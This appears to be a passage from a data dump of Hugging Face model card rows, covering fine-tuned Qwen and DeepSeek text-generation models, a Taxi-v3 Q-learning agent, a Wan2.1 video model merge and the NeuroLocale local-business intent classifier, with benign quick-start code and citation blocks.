| ----------------------------------------------------------------------- | --------------------------------------------------------------------------------- | -------------------------------------------------- |
| [ToxiGuardrailPT](https://huggingface.co/nicholasKluge/ToxiGuardrailPT) | 70.36% | 74.04% |
## Cite as 🤗
```latex
@misc{nicholas22aira,
doi = {10.5281/zenodo.6989727},
url = {https://github.com/Nkluge-correa/Aira},
author = {Nicholas Kluge Corrêa},
title = {Aira},
year = {2023},
publisher = {GitHub},
journal = {GitHub repository},
}
@phdthesis{kluge2024dynamic,
title={Dynamic Normativity},
author={Kluge Corr{\^e}a, Nicholas},
year={2024},
school={Universit{\"a}ts-und Landesbibliothek Bonn}
}
```
## License
ToxiGuardrailPT is licensed under the Apache License, Version 2.0. See the [LICENSE](LICENSE) file for more details. |
aledm03/new_MCQA_no_code_v2_shuffled_b256_lr5e-06 | aledm03 | 2025-06-09T11:54:45Z | 0 | 0 | transformers | [
"transformers",
"safetensors",
"qwen3",
"text-generation",
"text-generation-inference",
"unsloth",
"trl",
"sft",
"en",
"base_model:unsloth/Qwen3-0.6B-Base",
"base_model:finetune:unsloth/Qwen3-0.6B-Base",
"license:apache-2.0",
"autotrain_compatible",
"endpoints_compatible",
"region:us"
] | text-generation | 2025-06-09T11:54:10Z | ---
base_model: unsloth/Qwen3-0.6B-Base
tags:
- text-generation-inference
- transformers
- unsloth
- qwen3
- trl
- sft
license: apache-2.0
language:
- en
---
# Uploaded model
- **Developed by:** aledm03
- **License:** apache-2.0
- **Finetuned from model:** unsloth/Qwen3-0.6B-Base
This qwen3 model was trained 2x faster with [Unsloth](https://github.com/unslothai/unsloth) and Huggingface's TRL library.
[<img src="https://raw.githubusercontent.com/unslothai/unsloth/main/images/unsloth%20made%20with%20love.png" width="200"/>](https://github.com/unslothai/unsloth)
|
colinpannikkat/OpenRS-RLoRA-LoftQ-R32-3 | colinpannikkat | 2025-06-09T11:53:32Z | 0 | 0 | transformers | [
"transformers",
"safetensors",
"qwen2",
"text-generation",
"generated_from_trainer",
"open-r1",
"trl",
"grpo",
"conversational",
"dataset:knoveleng/open-rs",
"arxiv:2402.03300",
"base_model:deepseek-ai/DeepSeek-R1-Distill-Qwen-1.5B",
"base_model:finetune:deepseek-ai/DeepSeek-R1-Distill-Qwen-... | text-generation | 2025-06-09T05:10:54Z | ---
base_model: deepseek-ai/DeepSeek-R1-Distill-Qwen-1.5B
datasets: knoveleng/open-rs
library_name: transformers
model_name: OpenRS-RLoRA-LoftQ-R32-3
tags:
- generated_from_trainer
- open-r1
- trl
- grpo
licence: license
---
# Model Card for OpenRS-RLoRA-LoftQ-R32-3
This model is a fine-tuned version of [deepseek-ai/DeepSeek-R1-Distill-Qwen-1.5B](https://huggingface.co/deepseek-ai/DeepSeek-R1-Distill-Qwen-1.5B) on the [knoveleng/open-rs](https://huggingface.co/datasets/knoveleng/open-rs) dataset.
It has been trained using [TRL](https://github.com/huggingface/trl).
## Quick start
```python
from transformers import pipeline
question = "If you had a time machine, but could only go to the past or the future once and never return, which would you choose and why?"
generator = pipeline("text-generation", model="colinpannikkat/OpenRS-RLoRA-LoftQ-R32-3", device="cuda")
output = generator([{"role": "user", "content": question}], max_new_tokens=128, return_full_text=False)[0]
print(output["generated_text"])
```
## Training procedure
[<img src="https://raw.githubusercontent.com/wandb/assets/main/wandb-github-badge-28.svg" alt="Visualize in Weights & Biases" width="150" height="24"/>](https://wandb.ai/colinpannikkat-oregon-state-university/huggingface/runs/r4u12gw1)
This model was trained with GRPO, a method introduced in [DeepSeekMath: Pushing the Limits of Mathematical Reasoning in Open Language Models](https://huggingface.co/papers/2402.03300).
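GRPO's central idea is to compute advantages relative to a group of completions sampled for the same prompt: each completion's reward is normalized by the group's mean and standard deviation, so no separate value network is needed. A minimal sketch of that group-relative normalization (the reward values are made up for illustration):

```python
import statistics

def group_relative_advantages(rewards, eps=1e-8):
    """GRPO-style advantages: z-score each reward within its prompt group."""
    mean = statistics.fmean(rewards)
    std = statistics.pstdev(rewards)
    return [(r - mean) / (std + eps) for r in rewards]

# Four completions sampled for one prompt, scored by a rule-based reward
rewards = [1.0, 0.0, 0.5, 0.5]
advs = group_relative_advantages(rewards)
print(advs)  # above-average completions get positive advantage
```

These advantages then weight the policy-gradient update in place of a learned value baseline.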
### Framework versions
- TRL: 0.16.0.dev0
- Transformers: 4.51.3
- Pytorch: 2.5.1
- Datasets: 3.6.0
- Tokenizers: 0.21.1
## Citations
Cite GRPO as:
```bibtex
@article{zhihong2024deepseekmath,
title = {{DeepSeekMath: Pushing the Limits of Mathematical Reasoning in Open Language Models}},
author = {Zhihong Shao and Peiyi Wang and Qihao Zhu and Runxin Xu and Junxiao Song and Mingchuan Zhang and Y. K. Li and Y. Wu and Daya Guo},
year = 2024,
eprint = {arXiv:2402.03300},
}
```
Cite TRL as:
```bibtex
@misc{vonwerra2022trl,
title = {{TRL: Transformer Reinforcement Learning}},
author = {Leandro von Werra and Younes Belkada and Lewis Tunstall and Edward Beeching and Tristan Thrush and Nathan Lambert and Shengyi Huang and Kashif Rasul and Quentin Gallouédec},
year = 2020,
journal = {GitHub repository},
publisher = {GitHub},
howpublished = {\url{https://github.com/huggingface/trl}}
}
``` |
LLucass/ACC_TT_L0.2_H0.2_dr_grpo | LLucass | 2025-06-09T11:47:37Z | 0 | 0 | transformers | [
"transformers",
"safetensors",
"qwen2",
"text-generation",
"generated_from_trainer",
"open-r1",
"trl",
"grpo",
"conversational",
"dataset:knoveleng/open-rs",
"arxiv:2402.03300",
"base_model:deepseek-ai/DeepSeek-R1-Distill-Qwen-1.5B",
"base_model:finetune:deepseek-ai/DeepSeek-R1-Distill-Qwen-... | text-generation | 2025-06-09T10:07:55Z | ---
base_model: deepseek-ai/DeepSeek-R1-Distill-Qwen-1.5B
datasets: knoveleng/open-rs
library_name: transformers
model_name: ACC_TT_L0.2_H0.2_dr_grpo
tags:
- generated_from_trainer
- open-r1
- trl
- grpo
licence: license
---
# Model Card for ACC_TT_L0.2_H0.2_dr_grpo
This model is a fine-tuned version of [deepseek-ai/DeepSeek-R1-Distill-Qwen-1.5B](https://huggingface.co/deepseek-ai/DeepSeek-R1-Distill-Qwen-1.5B) on the [knoveleng/open-rs](https://huggingface.co/datasets/knoveleng/open-rs) dataset.
It has been trained using [TRL](https://github.com/huggingface/trl).
## Quick start
```python
from transformers import pipeline
question = "If you had a time machine, but could only go to the past or the future once and never return, which would you choose and why?"
generator = pipeline("text-generation", model="LLucass/ACC_TT_L0.2_H0.2_dr_grpo", device="cuda")
output = generator([{"role": "user", "content": question}], max_new_tokens=128, return_full_text=False)[0]
print(output["generated_text"])
```
## Training procedure
[<img src="https://raw.githubusercontent.com/wandb/assets/main/wandb-github-badge-28.svg" alt="Visualize in Weights & Biases" width="150" height="24"/>](https://wandb.ai/lavatorywang-nus/ACC/runs/pekyptep)
This model was trained with GRPO, a method introduced in [DeepSeekMath: Pushing the Limits of Mathematical Reasoning in Open Language Models](https://huggingface.co/papers/2402.03300).
### Framework versions
- TRL: 0.16.0.dev0
- Transformers: 4.51.3
- Pytorch: 2.5.1
- Datasets: 3.6.0
- Tokenizers: 0.21.1
## Citations
Cite GRPO as:
```bibtex
@article{zhihong2024deepseekmath,
title = {{DeepSeekMath: Pushing the Limits of Mathematical Reasoning in Open Language Models}},
author = {Zhihong Shao and Peiyi Wang and Qihao Zhu and Runxin Xu and Junxiao Song and Mingchuan Zhang and Y. K. Li and Y. Wu and Daya Guo},
year = 2024,
eprint = {arXiv:2402.03300},
}
```
Cite TRL as:
```bibtex
@misc{vonwerra2022trl,
title = {{TRL: Transformer Reinforcement Learning}},
author = {Leandro von Werra and Younes Belkada and Lewis Tunstall and Edward Beeching and Tristan Thrush and Nathan Lambert and Shengyi Huang and Kashif Rasul and Quentin Gallou{\'e}dec},
year = 2020,
journal = {GitHub repository},
publisher = {GitHub},
howpublished = {\url{https://github.com/huggingface/trl}}
}
``` |
John6666/bpm-blinks-paradise-merge-v-pred-v4-sdxl | John6666 | 2025-06-09T11:46:05Z | 0 | 0 | diffusers | [
"diffusers",
"safetensors",
"text-to-image",
"stable-diffusion",
"stable-diffusion-xl",
"anime",
"semi-realistic",
"2.5D",
"dark theme",
"skin shine",
"v-pred",
"noobai",
"illustrious",
"en",
"base_model:Laxhar/noobai-XL-Vpred-1.0",
"base_model:finetune:Laxhar/noobai-XL-Vpred-1.0",
"... | text-to-image | 2025-06-09T11:40:42Z | ---
license: other
license_name: faipl-1.0-sd
license_link: https://freedevproject.org/faipl-1.0-sd/
language:
- en
library_name: diffusers
pipeline_tag: text-to-image
tags:
- text-to-image
- stable-diffusion
- stable-diffusion-xl
- anime
- semi-realistic
- 2.5D
- dark theme
- skin shine
- v-pred
- noobai
- illustrious
base_model: Laxhar/noobai-XL-Vpred-1.0
---
Original model is [here](https://civitai.com/models/1611331/bpm-blinks-paradise-merge-v-pred?modelVersionId=1883810).
This model was created by [blinkdotleh](https://civitai.com/user/blinkdotleh).
|
Flo0620/Qwen2_5_7B_r32_a32_d0_2_ArXivQA | Flo0620 | 2025-06-09T11:37:23Z | 0 | 0 | transformers | [
"transformers",
"safetensors",
"generated_from_trainer",
"trl",
"sft",
"base_model:Qwen/Qwen2.5-VL-7B-Instruct",
"base_model:finetune:Qwen/Qwen2.5-VL-7B-Instruct",
"endpoints_compatible",
"region:us"
] | null | 2025-05-31T16:17:22Z | ---
base_model: Qwen/Qwen2.5-VL-7B-Instruct
library_name: transformers
model_name: Qwen2_5_7B_r32_a32_d0_2_ArXivQA
tags:
- generated_from_trainer
- trl
- sft
licence: license
---
# Model Card for Qwen2_5_7B_r32_a32_d0_2_ArXivQA
This model is a fine-tuned version of [Qwen/Qwen2.5-VL-7B-Instruct](https://huggingface.co/Qwen/Qwen2.5-VL-7B-Instruct).
It has been trained using [TRL](https://github.com/huggingface/trl).
## Quick start
```python
from transformers import pipeline
question = "If you had a time machine, but could only go to the past or the future once and never return, which would you choose and why?"
generator = pipeline("text-generation", model="Flo0620/Qwen2_5_7B_r32_a32_d0_2_ArXivQA", device="cuda")
output = generator([{"role": "user", "content": question}], max_new_tokens=128, return_full_text=False)[0]
print(output["generated_text"])
```
## Training procedure
This model was trained with SFT.
### Framework versions
- TRL: 0.15.2
- Transformers: 4.52.0.dev0
- Pytorch: 2.6.0+cu124
- Datasets: 3.5.0
- Tokenizers: 0.21.1
## Citations
Cite TRL as:
```bibtex
@misc{vonwerra2022trl,
title = {{TRL: Transformer Reinforcement Learning}},
author = {Leandro von Werra and Younes Belkada and Lewis Tunstall and Edward Beeching and Tristan Thrush and Nathan Lambert and Shengyi Huang and Kashif Rasul and Quentin Gallouédec},
year = 2020,
journal = {GitHub repository},
publisher = {GitHub},
howpublished = {\url{https://github.com/huggingface/trl}}
}
``` |
xzkb/q-learning-2 | xzkb | 2025-06-09T11:36:44Z | 0 | 0 | null | [
"Taxi-v3",
"q-learning",
"reinforcement-learning",
"custom-implementation",
"model-index",
"region:us"
] | reinforcement-learning | 2025-06-09T11:36:37Z | ---
tags:
- Taxi-v3
- q-learning
- reinforcement-learning
- custom-implementation
model-index:
- name: q-learning-2
results:
- task:
type: reinforcement-learning
name: reinforcement-learning
dataset:
name: Taxi-v3
type: Taxi-v3
metrics:
- type: mean_reward
value: 7.52 +/- 2.73
name: mean_reward
verified: false
---
# **Q-Learning** Agent playing **Taxi-v3**
This is a trained model of a **Q-Learning** agent playing **Taxi-v3**.
## Usage
```python
import gymnasium as gym

# `load_from_hub` is the helper defined in the Hugging Face Deep RL course notebook
model = load_from_hub(repo_id="xzkb/q-learning-2", filename="q-learning.pkl")
# Don't forget to check if you need to add additional attributes (is_slippery=False etc)
env = gym.make(model["env_id"])
```
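The loaded object wraps a plain Q-table; acting greedily over it can be sketched as follows (a minimal illustration with a made-up toy table — the real one is the pickled array downloaded above):

```python
import numpy as np

# Hypothetical 3-state, 2-action Q-table standing in for the downloaded one
q_table = np.array([
    [0.5, 1.2],   # state 0: action 1 has the highest value
    [2.0, 0.1],   # state 1: action 0 has the highest value
    [0.0, 0.0],   # state 2: tie, argmax returns action 0
])

def greedy_action(q_table, state):
    """Pick the action with the highest Q-value for the given state."""
    return int(np.argmax(q_table[state]))

print(greedy_action(q_table, 0))  # 1
```

At evaluation time this greedy policy is applied at every step of the episode, with no exploration.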
|
michelepunti/fff | michelepunti | 2025-06-09T11:32:03Z | 0 | 0 | null | [
"license:bigscience-bloom-rail-1.0",
"region:us"
] | null | 2025-06-09T11:32:03Z | ---
license: bigscience-bloom-rail-1.0
---
|
FLOPS-Squared/KeystoneFuse-E-FuserWidth-32-Instruct-Flax | FLOPS-Squared | 2025-06-09T11:29:09Z | 0 | 0 | transformers | [
"transformers",
"safetensors",
"llama",
"text-generation",
"conversational",
"arxiv:1910.09700",
"autotrain_compatible",
"text-generation-inference",
"endpoints_compatible",
"region:us"
] | text-generation | 2025-06-09T10:29:19Z | ---
library_name: transformers
tags: []
---
# Model Card for Model ID
<!-- Provide a quick summary of what the model is/does. -->
## Model Details
### Model Description
<!-- Provide a longer summary of what this model is. -->
This is the model card of a 🤗 transformers model that has been pushed on the Hub. This model card has been automatically generated.
- **Developed by:** [More Information Needed]
- **Funded by [optional]:** [More Information Needed]
- **Shared by [optional]:** [More Information Needed]
- **Model type:** [More Information Needed]
- **Language(s) (NLP):** [More Information Needed]
- **License:** [More Information Needed]
- **Finetuned from model [optional]:** [More Information Needed]
### Model Sources [optional]
<!-- Provide the basic links for the model. -->
- **Repository:** [More Information Needed]
- **Paper [optional]:** [More Information Needed]
- **Demo [optional]:** [More Information Needed]
## Uses
<!-- Address questions around how the model is intended to be used, including the foreseeable users of the model and those affected by the model. -->
### Direct Use
<!-- This section is for the model use without fine-tuning or plugging into a larger ecosystem/app. -->
[More Information Needed]
### Downstream Use [optional]
<!-- This section is for the model use when fine-tuned for a task, or when plugged into a larger ecosystem/app -->
[More Information Needed]
### Out-of-Scope Use
<!-- This section addresses misuse, malicious use, and uses that the model will not work well for. -->
[More Information Needed]
## Bias, Risks, and Limitations
<!-- This section is meant to convey both technical and sociotechnical limitations. -->
[More Information Needed]
### Recommendations
<!-- This section is meant to convey recommendations with respect to the bias, risk, and technical limitations. -->
Users (both direct and downstream) should be made aware of the risks, biases and limitations of the model. More information needed for further recommendations.
## How to Get Started with the Model
Use the code below to get started with the model.
[More Information Needed]
## Training Details
### Training Data
<!-- This should link to a Dataset Card, perhaps with a short stub of information on what the training data is all about as well as documentation related to data pre-processing or additional filtering. -->
[More Information Needed]
### Training Procedure
<!-- This relates heavily to the Technical Specifications. Content here should link to that section when it is relevant to the training procedure. -->
#### Preprocessing [optional]
[More Information Needed]
#### Training Hyperparameters
- **Training regime:** [More Information Needed] <!--fp32, fp16 mixed precision, bf16 mixed precision, bf16 non-mixed precision, fp16 non-mixed precision, fp8 mixed precision -->
#### Speeds, Sizes, Times [optional]
<!-- This section provides information about throughput, start/end time, checkpoint size if relevant, etc. -->
[More Information Needed]
## Evaluation
<!-- This section describes the evaluation protocols and provides the results. -->
### Testing Data, Factors & Metrics
#### Testing Data
<!-- This should link to a Dataset Card if possible. -->
[More Information Needed]
#### Factors
<!-- These are the things the evaluation is disaggregating by, e.g., subpopulations or domains. -->
[More Information Needed]
#### Metrics
<!-- These are the evaluation metrics being used, ideally with a description of why. -->
[More Information Needed]
### Results
[More Information Needed]
#### Summary
## Model Examination [optional]
<!-- Relevant interpretability work for the model goes here -->
[More Information Needed]
## Environmental Impact
<!-- Total emissions (in grams of CO2eq) and additional considerations, such as electricity usage, go here. Edit the suggested text below accordingly -->
Carbon emissions can be estimated using the [Machine Learning Impact calculator](https://mlco2.github.io/impact#compute) presented in [Lacoste et al. (2019)](https://arxiv.org/abs/1910.09700).
- **Hardware Type:** [More Information Needed]
- **Hours used:** [More Information Needed]
- **Cloud Provider:** [More Information Needed]
- **Compute Region:** [More Information Needed]
- **Carbon Emitted:** [More Information Needed]
## Technical Specifications [optional]
### Model Architecture and Objective
[More Information Needed]
### Compute Infrastructure
[More Information Needed]
#### Hardware
[More Information Needed]
#### Software
[More Information Needed]
## Citation [optional]
<!-- If there is a paper or blog post introducing the model, the APA and Bibtex information for that should go in this section. -->
**BibTeX:**
[More Information Needed]
**APA:**
[More Information Needed]
## Glossary [optional]
<!-- If relevant, include terms and calculations in this section that can help readers understand the model or model card. -->
[More Information Needed]
## More Information [optional]
[More Information Needed]
## Model Card Authors [optional]
[More Information Needed]
## Model Card Contact
[More Information Needed] |
eylulipci/30_dpo_ds30_lr3e-05_acc32_ep5_beta0.1-epoch5 | eylulipci | 2025-06-09T11:27:39Z | 0 | 0 | transformers | [
"transformers",
"safetensors",
"qwen3",
"text-generation",
"conversational",
"arxiv:1910.09700",
"autotrain_compatible",
"text-generation-inference",
"endpoints_compatible",
"region:us"
] | text-generation | 2025-06-09T11:24:47Z | ---
library_name: transformers
tags: []
---
# Model Card for Model ID
<!-- Provide a quick summary of what the model is/does. -->
## Model Details
### Model Description
<!-- Provide a longer summary of what this model is. -->
This is the model card of a 🤗 transformers model that has been pushed on the Hub. This model card has been automatically generated.
- **Developed by:** [More Information Needed]
- **Funded by [optional]:** [More Information Needed]
- **Shared by [optional]:** [More Information Needed]
- **Model type:** [More Information Needed]
- **Language(s) (NLP):** [More Information Needed]
- **License:** [More Information Needed]
- **Finetuned from model [optional]:** [More Information Needed]
### Model Sources [optional]
<!-- Provide the basic links for the model. -->
- **Repository:** [More Information Needed]
- **Paper [optional]:** [More Information Needed]
- **Demo [optional]:** [More Information Needed]
## Uses
<!-- Address questions around how the model is intended to be used, including the foreseeable users of the model and those affected by the model. -->
### Direct Use
<!-- This section is for the model use without fine-tuning or plugging into a larger ecosystem/app. -->
[More Information Needed]
### Downstream Use [optional]
<!-- This section is for the model use when fine-tuned for a task, or when plugged into a larger ecosystem/app -->
[More Information Needed]
### Out-of-Scope Use
<!-- This section addresses misuse, malicious use, and uses that the model will not work well for. -->
[More Information Needed]
## Bias, Risks, and Limitations
<!-- This section is meant to convey both technical and sociotechnical limitations. -->
[More Information Needed]
### Recommendations
<!-- This section is meant to convey recommendations with respect to the bias, risk, and technical limitations. -->
Users (both direct and downstream) should be made aware of the risks, biases and limitations of the model. More information needed for further recommendations.
## How to Get Started with the Model
Use the code below to get started with the model.
[More Information Needed]
## Training Details
### Training Data
<!-- This should link to a Dataset Card, perhaps with a short stub of information on what the training data is all about as well as documentation related to data pre-processing or additional filtering. -->
[More Information Needed]
### Training Procedure
<!-- This relates heavily to the Technical Specifications. Content here should link to that section when it is relevant to the training procedure. -->
#### Preprocessing [optional]
[More Information Needed]
#### Training Hyperparameters
- **Training regime:** [More Information Needed] <!--fp32, fp16 mixed precision, bf16 mixed precision, bf16 non-mixed precision, fp16 non-mixed precision, fp8 mixed precision -->
#### Speeds, Sizes, Times [optional]
<!-- This section provides information about throughput, start/end time, checkpoint size if relevant, etc. -->
[More Information Needed]
## Evaluation
<!-- This section describes the evaluation protocols and provides the results. -->
### Testing Data, Factors & Metrics
#### Testing Data
<!-- This should link to a Dataset Card if possible. -->
[More Information Needed]
#### Factors
<!-- These are the things the evaluation is disaggregating by, e.g., subpopulations or domains. -->
[More Information Needed]
#### Metrics
<!-- These are the evaluation metrics being used, ideally with a description of why. -->
[More Information Needed]
### Results
[More Information Needed]
#### Summary
## Model Examination [optional]
<!-- Relevant interpretability work for the model goes here -->
[More Information Needed]
## Environmental Impact
<!-- Total emissions (in grams of CO2eq) and additional considerations, such as electricity usage, go here. Edit the suggested text below accordingly -->
Carbon emissions can be estimated using the [Machine Learning Impact calculator](https://mlco2.github.io/impact#compute) presented in [Lacoste et al. (2019)](https://arxiv.org/abs/1910.09700).
- **Hardware Type:** [More Information Needed]
- **Hours used:** [More Information Needed]
- **Cloud Provider:** [More Information Needed]
- **Compute Region:** [More Information Needed]
- **Carbon Emitted:** [More Information Needed]
## Technical Specifications [optional]
### Model Architecture and Objective
[More Information Needed]
### Compute Infrastructure
[More Information Needed]
#### Hardware
[More Information Needed]
#### Software
[More Information Needed]
## Citation [optional]
<!-- If there is a paper or blog post introducing the model, the APA and Bibtex information for that should go in this section. -->
**BibTeX:**
[More Information Needed]
**APA:**
[More Information Needed]
## Glossary [optional]
<!-- If relevant, include terms and calculations in this section that can help readers understand the model or model card. -->
[More Information Needed]
## More Information [optional]
[More Information Needed]
## Model Card Authors [optional]
[More Information Needed]
## Model Card Contact
[More Information Needed] |
QuantStack/Wan2.1-14B-T2V-FusionX-VACE | QuantStack | 2025-06-09T11:22:46Z | 0 | 1 | null | [
"text-to-video",
"image-to-video",
"video-to-video",
"merge",
"en",
"base_model:Wan-AI/Wan2.1-VACE-14B",
"base_model:merge:Wan-AI/Wan2.1-VACE-14B",
"base_model:vrgamedevgirl84/Wan14BT2VFusioniX",
"base_model:merge:vrgamedevgirl84/Wan14BT2VFusioniX",
"license:apache-2.0",
"region:us"
] | image-to-video | 2025-06-08T08:43:50Z | ---
base_model:
- Wan-AI/Wan2.1-VACE-14B
- vrgamedevgirl84/Wan14BT2VFusioniX
base_model_relation: merge
tags:
- text-to-video
- image-to-video
- video-to-video
- merge
language:
- en
license: apache-2.0
---
This is a merge of [Wan-AI/Wan2.1-VACE-14B](https://huggingface.co/Wan-AI/Wan2.1-VACE-14B) scopes and [vrgamedevgirl84/Wan14BT2VFusioniX](https://huggingface.co/vrgamedevgirl84/Wan14BT2VFusioniX).
The process involved extracting the VACE scopes and injecting them into the target model.
- The model weights were then converted to specific FP8 formats (E4M3FN and E5M2) using the ComfyUI custom node [ComfyUI-ModelQuantizer](https://github.com/lum3on/ComfyUI-ModelQuantizer) by [lum3on](https://github.com/lum3on).
## Usage
The model files can be used in [ComfyUI](https://github.com/comfyanonymous/ComfyUI/) with the WanVaceToVideo node. Place the required model(s) in the following folders:
| Type | Name | Location | Download |
| ------------ | ----------------------------- | --------------------------------- | ----------------------- |
| Main Model | Wan2.1-14B-T2V-FusionX-VACE | `ComfyUI/models/diffusion_models` | Safetensors (this repo) |
| Text Encoder | umt5-xxl-encoder | `ComfyUI/models/text_encoders` | [Safetensors](https://huggingface.co/Comfy-Org/Wan_2.1_ComfyUI_repackaged/tree/main/split_files/text_encoders) / [GGUF](https://huggingface.co/city96/umt5-xxl-encoder-gguf/tree/main) |
| VAE | Wan2_1_VAE_bf16 | `ComfyUI/models/vae` | [Safetensors](https://huggingface.co/Kijai/WanVideo_comfy/blob/main/Wan2_1_VAE_bf16.safetensors) |
[**ComfyUI example workflow**](https://docs.comfy.org/tutorials/video/wan/vace)
### Notes
*All original licenses and restrictions from the base models still apply.*
## Reference
- For more information about the GGUF-quantized versions, refer to [QuantStack/Wan2.1-14B-T2V-FusionX-VACE-GGUF](https://huggingface.co/QuantStack/Wan2.1-14B-T2V-FusionX-VACE-GGUF).
- For an overview of the Safetensors format, see the [Safetensors documentation](https://huggingface.co/docs/safetensors/index). |
Vinh229/efficientnetb1 | Vinh229 | 2025-06-09T11:15:23Z | 0 | 0 | null | [
"pytorch",
"region:us"
] | null | 2025-06-09T11:13:24Z | # EfficientNetB1 (from scratch) - Real vs Fake Face Classifier
|
boltuix/NeuroLocale | boltuix | 2025-06-09T11:03:50Z | 107 | 10 | transformers | [
"transformers",
"safetensors",
"bert",
"text-classification",
"multi-text-classification",
"classification",
"intent-classification",
"intent-detection",
"nlp",
"natural-language-processing",
"edge-ai",
"iot",
"smart-home",
"location-intelligence",
"voice-assistant",
"conversational-ai... | text-classification | 2025-05-26T11:06:43Z | ---
license: apache-2.0
datasets:
- custom
language:
- en
base_model:
- boltuix/NeuroBERT
new_version: v1.1
metrics:
- accuracy
- f1
- recall
- precision
pipeline_tag: text-classification
library_name: transformers
tags:
- text-classification
- multi-text-classification
- classification
- intent-classification
- intent-detection
- nlp
- natural-language-processing
- transformers
- edge-ai
- iot
- smart-home
- location-intelligence
- voice-assistant
- conversational-ai
- real-time
- boltuix
- neurobert
- local-search
- business-category-classification
- fast-inference
- lightweight-model
- on-device-nlp
- offline-nlp
- mobile-ai
- multilingual-nlp
- bert
- intent-routing
- category-detection
- query-understanding
- artificial-intelligence
- assistant-ai
- smart-cities
- customer-support
- productivity-tools
- contextual-ai
- semantic-search
- user-intent
- microservices
- smart-query-routing
- industry-application
- aiops
- domain-specific-nlp
- location-aware-ai
- intelligent-routing
- edge-nlp
- smart-query-classifier
- zero-shot-classification
- smart-search
- location-awareness
- contextual-intelligence
- geolocation
- query-classification
- multilingual-intent
- chatbot-nlp
- enterprise-ai
- sdk-integration
- api-ready
- developer-tools
- real-world-ai
- geo-intelligence
- embedded-ai
- smart-routing
- voice-interface
- smart-devices
- contextual-routing
- fast-nlp
- data-driven-ai
- inference-optimization
- digital-assistants
- neural-nlp
- ai-automation
- lightweight-transformers
---

# 🌍 NeuroLocale — Your Smarter Nearby Assistant! 🗺️
[](https://opensource.org/licenses)
[](https://huggingface.co/boltuix/NeuroLocale)
[](https://huggingface.co/boltuix/NeuroLocale)
> **Understand Intent, Find Nearby Solutions** 💡
> **NeuroLocale** is an intelligent AI assistant powered by **NeuroBERT**, designed to interpret natural, conversational queries and suggest precise local business categories in real time. Unlike traditional map services that struggle with NLP, NeuroLocale captures personal intent to deliver actionable results—whether it’s finding a 🐾 pet store for a sick dog or a 💼 accounting firm for tax help.
With support for **120+ local business categories**, NeuroLocale combines open-source datasets and advanced fine-tuning to overcome the limitations of Google Maps’ NLP. Open source and extensible, it’s perfect for developers and businesses building context-aware local search solutions. 🚀
**[Explore NeuroLocale](https://huggingface.co/boltuix/NeuroLocale)** 🌟
## Table of Contents 📋
- [Why NeuroLocale?](#why-neurolocale) 🌈
- [Key Features](#key-features) ✨
- [Supported Categories](#supported-categories) 🏪
- [Installation](#installation) 🛠️
- [Quickstart: Dive In](#quickstart-dive-in) 🚀
- [Training the Model](#training-the-model) 🧠
- [Evaluation](#evaluation) 📈
- [Dataset Details](#dataset-details) 📊
- [Use Cases](#use-cases) 🌍
- [Comparison to Other Solutions](#comparison-to-other-solutions) ⚖️
- [Source](#source) 🌱
- [License](#license) 📜
- [Credits](#credits) 🙌
- [Community & Support](#community--support) 🌐
- [Last Updated](#last-updated) 📅
---
## Why NeuroLocale? 🌈
- **Intent-Driven** 🧠: Understands natural language queries like “My dog isn’t eating” to suggest 🐾 pet stores or 🩺 veterinary clinics.
- **Accurate & Fast** ⚡: Achieves **94.26% test accuracy** (115/122 correct) for precise category predictions in real time.
- **Extensible** 🛠️: Open source and customizable with your own datasets (e.g., ChatGPT, Grok, or proprietary data).
- **Comprehensive** 🏪: Supports **120+ local business categories**, from 💼 accounting firms to 🦒 zoos.
> “NeuroLocale transformed our app’s local search—it feels like it *gets* the user!” — App Developer 💬
---
## Key Features ✨
- **Advanced NLP** 📜: Built on **NeuroBERT**, fine-tuned for multi-class text classification.
- **Real-Time Results** ⏱️: Delivers category suggestions instantly, even for complex queries.
- **Wide Coverage** 🗺️: Matches queries to 120+ business categories with high confidence.
- **Developer-Friendly** 🧑💻: Easy integration with Python 🐍, Hugging Face 🤗, and custom APIs.
- **Open Source** 🌐: Freely extend and adapt for your needs.
---
## 🔧 How to Use
```python
from transformers import pipeline # 🤗 Import Hugging Face pipeline
# 🚀 Load the fine-tuned intent classification model
classifier = pipeline("text-classification", model="boltuix/NeuroLocale")
# 🧠 Predict the user's intent from a sample input sentence
result = classifier("Where can I see ocean creatures behind glass?") # 🐠 Expecting Aquarium
# 📊 Print the classification result with label and confidence score
print(result) # 🖨️ Example output: [{'label': 'aquarium', 'score': 0.999}]
```
---
## Supported Categories 🏪
NeuroLocale supports **120+ local business categories**, each paired with an emoji for clarity:
- 💼 Accounting Firm
- ✈️ Airport
- 🎢 Amusement Park
- 🐠 Aquarium
- 🖼️ Art Gallery
- 🏧 ATM
- 🚗 Auto Dealership
- 🔧 Auto Repair Shop
- 🥐 Bakery
- 🏦 Bank
- 🍻 Bar
- 💈 Barber Shop
- 🏖️ Beach
- 🚲 Bicycle Store
- 📚 Book Store
- 🎳 Bowling Alley
- 🚌 Bus Station
- 🥩 Butcher Shop
- ☕ Cafe
- 📸 Camera Store
- ⛺ Campground
- 🚘 Car Rental
- 🧼 Car Wash
- 🎰 Casino
- ⚰️ Cemetery
- ⛪ Church
- 🏛️ City Hall
- 🩺 Clinic
- 👗 Clothing Store
- ☕ Coffee Shop
- 🏪 Convenience Store
- 🍳 Cooking School
- 🖨️ Copy Center
- 📦 Courier Service
- ⚖️ Courthouse
- ✂️ Craft Store
- 💃 Dance Studio
- 🦷 Dentist
- 🏬 Department Store
- 🩺 Doctor’s Office
- 💊 Drugstore
- 🧼 Dry Cleaner
- ⚡️ Electrician
- 📱 Electronics Store
- 🏫 Elementary School
- 🏛️ Embassy
- 🚒 Fire Station
- 💐 Florist
- 🌸 Flower Shop
- ⚰️ Funeral Home
- 🛋️ Furniture Store
- 🎮 Gaming Center
- 🌳 Gardening Service
- 🎁 Gift Shop
- 🏛️ Government Office
- 🛒 Grocery Store
- 💪 Gym
- 💇 Hair Salon
- 🔨 Handyman
- 🔩 Hardware Store
- 🕉️ Hindu Temple
- 🏠 Home Goods Store
- 🏥 Hospital
- 🏨 Hotel
- 🧹 House Cleaning
- 🛡️ Insurance Agency
- ☕ Internet Cafe
- 💎 Jewelry Store
- 🗣️ Language School
- 🧼 Laundromat
- ⚖️ Lawyer
- 📚 Library
- 🚈 Light Rail Station
- 🔒 Locksmith
- 🏡 Lodging
- 🛍️ Market
- 🍽️ Meal Delivery Service
- 🕌 Mosque
- 🎥 Movie Theater
- 🚚 Moving Company
- 🏛️ Museum
- 🎵 Music School
- 🎸 Music Store
- 💅 Nail Salon
- 🎉 Night Club
- 🌱 Nursery
- 🖌️ Office Supply Store
- 🌳 Park
